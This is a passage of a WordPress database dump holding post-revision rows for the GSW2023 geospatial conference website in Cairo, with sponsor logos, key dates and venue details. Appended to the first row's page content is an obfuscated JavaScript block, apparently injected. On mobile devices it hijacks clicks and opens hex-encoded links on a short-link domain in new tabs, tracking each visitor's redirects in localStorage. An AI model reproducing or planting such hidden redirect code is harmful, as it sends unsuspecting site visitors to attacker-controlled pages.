href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):</strong></p>\n<p><strong>15 April 2023</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]Payment of Registration is Opened Now[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-04-16 20:25:30','2023-04-16 20:25:30','',3066,'https://gsw2023.com/?p=4055',0,'revision','',0),
(4056,1,'2023-04-16 20:28:20','2023-04-16 20:28:20','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner 